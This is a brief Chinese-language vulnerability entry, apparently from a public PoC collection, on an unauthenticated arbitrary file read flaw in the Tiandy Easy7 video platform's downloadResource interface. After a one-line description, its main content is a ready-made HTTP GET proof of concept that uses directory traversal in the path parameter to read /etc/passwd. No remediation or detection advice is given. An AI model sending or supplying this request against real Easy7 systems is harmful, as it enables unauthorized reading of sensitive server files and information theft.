天地伟业Easy7 downloadResource 任意文件读取漏洞

日期: 2025-09-05 | 影响软件: 天地伟业Easy7 | POC: 已公开

漏洞描述

天地伟业Easy7平台存在前台的任意文件读取接口,可构造请求包,读取系统内部敏感文件,造成信息泄露。

PoC代码

GET /Easy7/rest/file/downloadResource?path=/../../../../../../../../etc/passwd HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.2609.50 Safari/537.36

相关漏洞推荐